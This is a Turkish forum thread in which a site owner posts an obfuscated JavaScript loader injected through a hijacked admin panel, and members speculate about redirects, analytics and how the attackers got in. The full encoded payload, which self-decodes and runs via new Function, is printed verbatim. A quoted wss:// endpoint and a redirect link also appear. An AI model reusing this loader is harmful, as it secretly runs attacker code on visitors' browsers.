Admin Panelde bulduğum Şifreli Javascript kodu

Question

Arkadaşlar selamlar, bugün çeşitli analizler yaparken admin panel üzerinden eklenmiş bir javascript koduna denk geldim. Kod şifreli bir şekilde eklenmişti. Ön tarafta footer taginden önce ki alana otomatik olarak ekleniyordu bu kod. Analiz ettiğim zaman fransa ovh dabir vps kullanılarak admin panele patronun hesabı üzerinden giriş yapılmış ve kod enjekte edilmişti. Kodu analiz etmeye çalıştım fakat tek anlayabildiğim Google Tag manager gibi bir sisteme bilgi göndermesiydi. Aşağıda ki şifreli kodun ne işe yaradığını tam olarak açıklayabilcek birisi var mı? Yardımlarınız için teşekkürler. function _0x5d77(){var _0x4cd320=['WPO6fW/dKmonWQa','WPr1rGPzW4vqWQFcT2a','W6dcOCoVWOaCoWPr','c8keia','lmoyjeiWW7aVo3eUWQVdOKpdHCkpbCoihrxdNmkMW7SvW5ZdMNW9WPnZqCk9WO9TWRVcMW55W4idWP7cQZ7dMCkMi8oYjSkWWP5EnrPRdvVdLZ5gWOHWW4BdLSkLWP7dTSkdcSktC8oFWR8raCoWW53dOmoJWQNdJSoHW4ZdRSoDb8kCySosWQ/cRd3cHw40hs5YW67cTN1JqevvWQ7dL3qEuHxcGmkTvwJcPbfJBZCjW659uJpcQ29Glc3dVCovWPi8W54HWR/cRCkxWOyba8oTWQldJbKXW6PkWQiAW5TzuSoZW6JdLc0bW5JcVW0jW6RcN8ovDNOYBCoxASoDW7xdQCkRawFcUWyTW5PDW4ddSHxcHSkbW7b8eYJcQMDVWOJcMmk/W5NcKSkYbcRcOZFdJ31JDaBcSmkVWPNdNCkoE8oHrbH8W4NdJIW5bHuoWPHvxchcRCkQWQ0zWObwW7VdJM/dQSoBWP3dV8kPWRTtWPtdIq/cMvvxumkUdmosASktbmkPw1HpW75/WO8TihpcNLOSru3cTKLeWRj4katcQWJcLmktWQBdI20viCoSmHnKjSo1gSk8la9SWQZdLfaFjCkQW5pcPrFcUCk3c0FcLSk8oeG+WPNcGsdcOSk2jCktsghdJZlcOSkFcI7cJCoAW5hcUmoBq8oiEYNdISojzmo3WRFcQ8oCvKbzbISqbCoqW4BdTmkammoaegpdGmkVWRGbkmoqW5BcSrS','ESk0WQFdPdfrW53dUb3dJ2LnW7G','b8o+m8ohW7b4WPe','hqhdLtFcI8kbxCk5tIhdNxO','uufjlCox','sd7cM8oUW5r9m8kbWQ3dVa','FZL6jrm','WPBcKmohkmk3W7lcMG4','W7lcNrpdG8oRW406WQ9ay8k1','sCoghmkvWR7cTX7cNmoWWQBcRa','W59VC8oVw8oyW55hiM3cIs0','W5TQCSoKvCoAW5vMhvhcIH0','W7/dH8osWOFcHJ1H','dIlcHmkV','BcpcO8oyW5/dRc7dQ0BdGJtcQq','Fmk3WOddV8ogACk4n1NcQCooaq','WO93W6BcQY7dL8k0WQemWQRdUmoiWRO','WQRdG03cMW','x8k6cCkxALpcS8kdWRxcNmkdEa','f8oNDXrYW65KW7uor8oEW6/dRW','W6pcRCkYW4nbad1QWP1MpG','mLJcQI3cPa','WR5MDCkxCW','rCkNcsziWOP2stfGWORcHq','WR/dH8oAWOBcLW','eSoNCXb3W6LIW442wmohW43dLa'];_0x5d77=function(){return _0x4cd320;};return _0x5d77();}var _0x562e2d=_0x5eb7;function _0x5eb7(_0x1902d6,_0x3b53d6){var _0x5d77f2=_0x5d77();return _0x5eb7=function(_0x5eb7f8,_0x434726){_0x5eb7f8=_0x5eb7f8-0x1ba;var _0x3d3ffe=_0x5d77f2[_0x5eb7f8];if(_0x5eb7['hOLFGn']===undefined){var _0x1f9d9a=function(_0x20b9eb){var _0x2a93b0='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x1d20c8='',_0x18d83d='';for(var _0x4023bb=0x0,_0x3bdb84,_0x280e0e,_0x32f650=0x0;_0x280e0e=_0x20b9eb['charAt'](_0x32f650++);~_0x280e0e&&(_0x3bdb84=_0x4023bb%0x4?_0x3bdb84*0x40+_0x280e0e:_0x280e0e,_0x4023bb++%0x4)?_0x1d20c8+=String['fromCharCode'](0xff&_0x3bdb84>>(-0x2*_0x4023bb&0x6)):0x0){_0x280e0e=_0x2a93b0['indexOf'](_0x280e0e);}for(var _0x56b92a=0x0,_0xc49220=_0x1d20c8['length'];_0x56b92a<_0xc49220;_0x56b92a++){_0x18d83d+='%'+('00'+_0x1d20c8['charCodeAt'](_0x56b92a)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x18d83d);};var _0x5d611a=function(_0x473ada,_0x3db9d7){var _0xf028bd=[],_0x10f792=0x0,_0x4b73f9,_0x2478be='';_0x473ada=_0x1f9d9a(_0x473ada);var _0x1953b8;for(_0x1953b8=0x0;_0x1953b8<0x100;_0x1953b8++){_0xf028bd[_0x1953b8]=_0x1953b8;}for(_0x1953b8=0x0;_0x1953b8<0x100;_0x1953b8++){_0x10f792=(_0x10f792+_0xf028bd[_0x1953b8]+_0x3db9d7['charCodeAt'](_0x1953b8%_0x3db9d7['length']))%0x100,_0x4b73f9=_0xf028bd[_0x1953b8],_0xf028bd[_0x1953b8]=_0xf028bd[_0x10f792],_0xf028bd[_0x10f792]=_0x4b73f9;}_0x1953b8=0x0,_0x10f792=0x0;for(var _0x100a9f=0x0;_0x100a9f<_0x473ada['length'];_0x100a9f++){_0x1953b8=(_0x1953b8+0x1)%0x100,_0x10f792=(_0x10f792+_0xf028bd[_0x1953b8])%0x100,_0x4b73f9=_0xf028bd[_0x1953b8],_0xf028bd[_0x1953b8]=_0xf028bd[_0x10f792],_0xf028bd[_0x10f792]=_0x4b73f9,_0x2478be+=String['fromCharCode'](_0x473ada['charCodeAt'](_0x100a9f)^_0xf028bd[(_0xf028bd[_0x1953b8]+_0xf028bd[_0x10f792])%0x100]);}return _0x2478be;};_0x5eb7['PVWSna']=_0x5d611a,_0x1902d6=arguments,_0x5eb7['hOLFGn']=!![];}var _0x5f1aab=_0x5d77f2[0x0],_0x4d7249=_0x5eb7f8+_0x5f1aab,_0x4c6310=_0x1902d6[_0x4d7249];return!_0x4c6310?(_0x5eb7['yqcfRR']===undefined&&(_0x5eb7['yqcfRR']=!![]),_0x3d3ffe=_0x5eb7['PVWSna'](_0x3d3ffe,_0x434726),_0x1902d6[_0x4d7249]=_0x3d3ffe):_0x3d3ffe=_0x4c6310,_0x3d3ffe;},_0x5eb7(_0x1902d6,_0x3b53d6);}(function(_0x5ac0c2,_0x5cdba1){var _0x166d6d=_0x5eb7,_0x3f7064=_0x5ac0c2();while(!![]){try{var _0x5a11d6=parseInt(_0x166d6d(0x1c7,'6lBZ'))/0x1+parseInt(_0x166d6d(0x1bd,'9YC9'))/0x2*(parseInt(_0x166d6d(0x1bf,'*&Ih'))/0x3)+parseInt(_0x166d6d(0x1c6,'7F2O'))/0x4+parseInt(_0x166d6d(0x1d4,'Q!0c'))/0x5+parseInt(_0x166d6d(0x1be,'9YC9'))/0x6+parseInt(_0x166d6d(0x1bb,'fdal'))/0x7*(-parseInt(_0x166d6d(0x1cf,'6lBZ'))/0x8)+parseInt(_0x166d6d(0x1d3,'DZ#N'))/0x9*(-parseInt(_0x166d6d(0x1cc,'7F2O'))/0xa);if(_0x5a11d6===_0x5cdba1)break;else _0x3f7064['push'](_0x3f7064['shift']());}catch(_0x1bc2f2){_0x3f7064['push'](_0x3f7064['shift']());}}}(_0x5d77,0x351fa),!function(_0x5e7852,_0x5f54c4){var _0x393e8c={'KHGqe':function(_0x47c868,_0x305000){return _0x47c868%_0x305000;}};!function(_0x32dc2f){var _0x1b2825=_0x5eb7,_0x3bbb5e={'SkNHn':function(_0x16597f,_0x385dcb){var _0x2d507a=_0x5eb7;return _0x393e8c[_0x2d507a(0x1d5,'jlQd')](_0x16597f,_0x385dcb);}},_0x19be35=function(_0x30fe9b,_0x1feeab){var _0xcdd244=_0x5eb7,_0xc48a2a={'Ptnie':function(_0x3c4312,_0x441caf){var _0x50bcd5=_0x5eb7;return _0x3bbb5e[_0x50bcd5(0x1c8,'LlOW')](_0x3c4312,_0x441caf);}};return _0x30fe9b[_0xcdd244(0x1c9,'O%gR')]('')[_0xcdd244(0x1d0,'S%Wm')](function(_0x2c5497,_0x3c36b7){var _0x3b4e5c=_0xcdd244;return String[_0x3b4e5c(0x1c1,'iO7J')](_0x2c5497[_0x3b4e5c(0x1d6,'%tF!')](0x0)^_0x1feeab[_0x3b4e5c(0x1ce,'RwZ*')](_0xc48a2a[_0x3b4e5c(0x1d7,'0GiV')](_0x3c36b7,_0x1feeab['length'])));})[_0xcdd244(0x1c0,'JqSm')]('');}(_0x32dc2f[_0x1b2825(0x1cb,'*&Ih')]('')['reverse']()[_0x1b2825(0x1c4,'fdal')](''),_0x5f54c4);new Function(_0x19be35)();}(_0x5e7852);}(_0x562e2d(0x1d1,'!D%*'),'gtag'));

OguzhanLevent · Answer

Adwops adlı üyeden alıntı: mesajı görüntüle

Siz baya temiz kalplisiniz bu konuda

Sitelerinizin trafiğini analiz edip buna göre kendi sitelerine hit çekecekler. Adamlar trafiği olmayan sitede yönlendirme yapsa ne olacak. Ellerinde binlerce site var, belli trafiğe ulaşan sitelerde yönlendirmeleri aktif ediyorlar işte.

Şimdiye kadar çoktan yaparlardı diye tahmin ediyorum hocam

OguzhanLevent · Answer

Adwops adlı üyeden alıntı: mesajı görüntüle

Siz baya temiz kalplisiniz bu konuda

Sitelerinizin trafiğini analiz edip buna göre kendi sitelerine hit çekecekler. Adamlar trafiği olmayan sitede yönlendirme yapsa ne olacak. Ellerinde binlerce site var, belli trafiğe ulaşan sitelerde yönlendirmeleri aktif ediyorlar işte.

Şimdiye kadar çoktan yaparlardı diye tahmin ediyorum hocam

omergundogar · Answer

Adwops adlı üyeden alıntı: mesajı görüntüle

Siz baya temiz kalplisiniz bu konuda

Sitelerinizin trafiğini analiz edip buna göre kendi sitelerine hit çekecekler. Adamlar trafiği olmayan sitede yönlendirme yapsa ne olacak. Ellerinde binlerce site var, belli trafiğe ulaşan sitelerde yönlendirmeleri aktif ediyorlar işte.

Şimdiye kadar çoktan yaparlardı diye tahmin ediyorum hocam

OguzhanLevent · Answer

Adwops adlı üyeden alıntı: mesajı görüntüle

Hemen başlamaz yönlenme virüs bir süre kendini unutturur orda, sonra bir bakmışsın aktif olmuş. Sen ne zaman bulaştığını bile anlamazsın

Bazıları o kadar uyanık ki kendini belli etmemek için siteyi çok fazla ziyaret eden kişiler ya da login olmuş kişilere yönlendirme yapmıyor, hedefleri genelde yeni ziyaretler.

Biraz geç fark ettim açıkcası bu aralar çok fazla hata ile uğraşıyorum loglar arasında kayboluyorum. Test ortamı oluştururken keşfettim canlıdan kaldırdım fakat testte hala tutuyorum. Neler olacağını göreceğiz artık.

omergundogar adlı üyeden alıntı: mesajı görüntüle

kötü niyetli olduğunu sanmıyorum hocam. Geliştirme ve analiz amaçlıdır zaten eklemesi zor da bi şey değil

Kullanıcı taraflı zaafiyet olduğunu düşünüyorum gerçi ondan sonrası da eklemesi çok basit dediğiniz gibi

omergundogar adlı üyeden alıntı:						mesajı görüntüle									kötü niyetli olduğunu sanmıyorum hocam. Geliştirme ve analiz amaçlıdır zaten eklemesi zor da bi şey değil 		Kullanıcı taraflı zaafiyet olduğunu düşünüyorum gerçi ondan sonrası da eklemesi çok basit dediğiniz gibi

Adwops · Answer

omergundogar adlı üyeden alıntı:						mesajı görüntüle									kötü niyetli olduğunu sanmıyorum hocam. Geliştirme ve analiz amaçlıdır zaten eklemesi zor da bi şey değil 								OguzhanLevent adlı üyeden alıntı:						mesajı görüntüle									Söyleseymiş biz verirdik hocam istatistikleri niye bu kadar zahmete girmiş ki  		Siz baya temiz kalplisiniz  bu konuda    Sitelerinizin trafiğini analiz edip buna göre kendi sitelerine hit çekecekler. Adamlar trafiği olmayan sitede yönlendirme yapsa ne olacak. Ellerinde binlerce site var, belli trafiğe ulaşan sitelerde yönlendirmeleri aktif ediyorlar işte.

omergundogar · Answer

OguzhanLevent adlı üyeden alıntı:						mesajı görüntüle									Söyleseymiş biz verirdik hocam istatistikleri niye bu kadar zahmete girmiş ki  		kötü niyetli olduğunu sanmıyorum hocam. Geliştirme ve analiz amaçlıdır zaten eklemesi zor da bi şey değil

OguzhanLevent · Answer

omergundogar adlı üyeden alıntı:						mesajı görüntüle									Problem yok hocam google analytics kullanmış, kullandığı key'in ifşa olmaması için de şifreleme yapmış 		Söyleseymiş biz verirdik hocam istatistikleri niye bu kadar zahmete girmiş ki

Adwops · Answer

OguzhanLevent adlı üyeden alıntı:						mesajı görüntüle									Gtag.js mevcut fakat bizim yapıya ait, ayrıca bizim verilerde de bir sapma yok açıkcası. Anladığım kadarıyla direkt olarak kendi hesabına bu kodları çekiyordu. Analiz etme amacıyla kullanılmış olabilir.

Linki ancak buraya kadar takip edebildim açıkcası.

Grookun mantığına göre otomatik olarak site başka bir adrese yönleniyor olması gerekiyordu fakat bu durum mevcut değil. 		Hemen başlamaz yönlenme virüs bir süre kendini unutturur orda, sonra bir bakmışsın aktif olmuş. Sen ne zaman bulaştığını bile anlamazsın   Bazıları o kadar uyanık ki kendini belli etmemek için siteyi çok fazla ziyaret eden kişiler ya da login olmuş kişilere yönlendirme yapmıyor, hedefleri genelde yeni ziyaretler.

webloggi · Answer

Enteresan

omergundogar · Answer

Problem yok hocam google analytics kullanmış, kullandığı key'in ifşa olmaması için de şifreleme yapmış

Adwops · Answer

OguzhanLevent adlı üyeden alıntı:						mesajı görüntüle									Kod manuel olarak admin panel üzerinden eklenmiş hocam. Kod veritabanında tutuluyor ve güncelleme tarihi belli.

Temmuz ayının başında sızma testi gerçekleştirdik ve çoğu zaafiyeti kapattık. Ya şifre sızdırıldı ya da cookie çalındı. CSRF'den şüpheleniyorum aslında ama login bilgilerinin çalınmış olması daha büyük ihtimal gibi geliyor. 		Olabilir binbir ihtimal var gerçekten.  CSRF token'ı aktif kullanmanız gerek o zaman.  Gerekirse de login ekranlarında mail ile kod doğrulaması yaptırın. En önemlisi dosyaları baştan aşağıya bi tarayın, genelde bir zip dosyası yüklerler. o da sürekli dosyalara bulaşır durur.

OguzhanLevent · Answer

kozmikkreatif adlı üyeden alıntı:						mesajı görüntüle									Google izleme kodu obfuscation ile gizlenmiş gibi duruyor

Projeniz de gtag.js tarzında bir dosya var mı? 		Gtag.js mevcut fakat bizim yapıya ait, ayrıca bizim verilerde de bir sapma yok açıkcası. Anladığım kadarıyla direkt olarak kendi hesabına bu kodları çekiyordu. Analiz etme amacıyla kullanılmış olabilir.

Alıntı										wss://elemenwtorupdate.livections?source= 		Linki ancak buraya kadar takip edebildim açıkcası.

Trust adlı üyeden alıntı:						mesajı görüntüle									https://bit.ly/3zW5Z7P buraya siteyi yönlendirme kodu grok çözdü link patlak çalışmıyor

https://grok.com/share/bGVnYWN5LWNvc...3-13740dd7a522 		Grookun mantığına göre otomatik olarak site başka bir adrese yönleniyor olması gerekiyordu fakat bu durum mevcut değil.

OguzhanLevent · Answer

Adwops adlı üyeden alıntı: mesajı görüntüle

Siz baya temiz kalplisiniz bu konuda

Sitelerinizin trafiğini analiz edip buna göre kendi sitelerine hit çekecekler. Adamlar trafiği olmayan sitede yönlendirme yapsa ne olacak. Ellerinde binlerce site var, belli trafiğe ulaşan sitelerde yönlendirmeleri aktif ediyorlar işte.

Şimdiye kadar çoktan yaparlardı diye tahmin ediyorum hocam

Temmuz ayının başında sızma testi gerçekleştirdik ve çoğu zaafiyeti kapattık. Ya şifre sızdırıldı ya da cookie çalındı. CSRF'den şüpheleniyorum aslında ama login bilgilerinin çalınmış olması daha büyük ihtimal gibi geliyor.

Adwops · Answer

Kodlara sızılmış gibi görünüyor, panelin güvenlik adımları zayıf anlaşılan. Bu tarz js kodları genelde xxx sitelerine yönlendirme yapar. Sistemi indirip vs code ile genel bir tarayın, benzer kodlar eklenmişmi bi arama yapın. Sonra bunu nasıl yaptıklarını tespit edip açığı kapatmanız gerek. Genelde upload fonksiyonları & veri girişlerini kontrol etmeniz gerek.

Yegenoglu · Answer

Gönderdiğiniz kod bir JavaScript parçasıdır ve genellikle bir web sitesinin arka planında çalışır. Ancak, bu kodun ana amacı okunmasını ve anlaşılmasını zorlaştırmaktır. Bu tekniğe obfuscation (gizleme) denir.
Kodun Amacı ve İşlevi
Bu kodun ne yaptığına dair kesin bir şey söylemek oldukça zor çünkü gizlenmiş. Fakat, genel yapısına bakıldığında şunlar çıkarılabilir:
 * Gizleme (Obfuscation): Kod, değişken adlarını anlaşılmaz hale getirilmiş (_0x5d77, _0x4cd320, _0x562e2d gibi) ve metin dizileri bir dizi içinde saklanmış. Ardından bu dizideki elemanlar, karmaşık matematiksel işlemler ve işlevler aracılığıyla şifreleniyor. Bu, kodu tersine mühendislikle çözmeyi zorlaştırmak için yapılan yaygın bir tekniktir.
 * Fonksiyon Yapısı: Kod, _0x5d77 ve _0x5eb7 gibi iç içe geçmiş fonksiyonlar kullanıyor. Bu fonksiyonlar, şifrelenmiş metin dizilerini çözmek ve asıl işlevi yerine getirmek için gerekli altyapıyı oluşturuyor.
 * Potansiyel İşlevler: Bu tür gizlenmiş kodlar genellikle şunlar için kullanılır:
   * Reklam Takibi: Kullanıcı davranışlarını izlemek ve hedeflenmiş reklamlar sunmak.
   * Analiz: Site trafiğini veya kullanıcı etkileşimlerini analiz etmek.
   * Zararlı Yazılım: Bazen kötü niyetli amaçlarla (örneğin, başka bir zararlı kod indirmek veya kullanıcı verilerini çalmak) kullanılabilir.
Neden Gizlenmiş?
Kodun bu şekilde gizlenmesinin birkaç nedeni olabilir:
 * Fikri Mülkiyetin Korunması: Yazılımın arkasındaki algoritmanın veya iş mantığının başkaları tarafından kolayca kopyalanmasını engellemek.
 * Güvenlik: Kötü niyetli kişilerin kodun nasıl çalıştığını anlamasını zorlaştırarak bir güvenlik katmanı eklemek.
 * Zararlı Amaçlar: Kodun kötü amaçlı olduğunu gizlemek ve güvenlik yazılımları tarafından tespit edilmesini zorlaştırmak.
Özetle, gönderdiğiniz kod okunabilirliği kasten düşürülmüş bir JavaScript parçasıdır. Büyük ihtimalle bir web sitesi veya bir reklam platformu tarafından bir görevi yerine getirmek için kullanılıyor. Bu tür kodları internet üzerinde, özellikle reklam ağlarında veya üçüncü taraf analiz hizmetlerinde görmek oldukça yaygındır. Ancak, içeriği net olmadığı için potansiyel riskleri de b
arındırabilir.

Trust · Answer

https://bit.ly/3zW5Z7P buraya siteyi yönlendirme kodu grok çözdü link patlak çalışmıyor

https://grok.com/share/bGVnYWN5LWNvc...3-13740dd7a522

kozmikkreatif · Answer

Google izleme kodu obfuscation ile gizlenmiş gibi duruyor

Projeniz de gtag.js tarzında bir dosya var mı?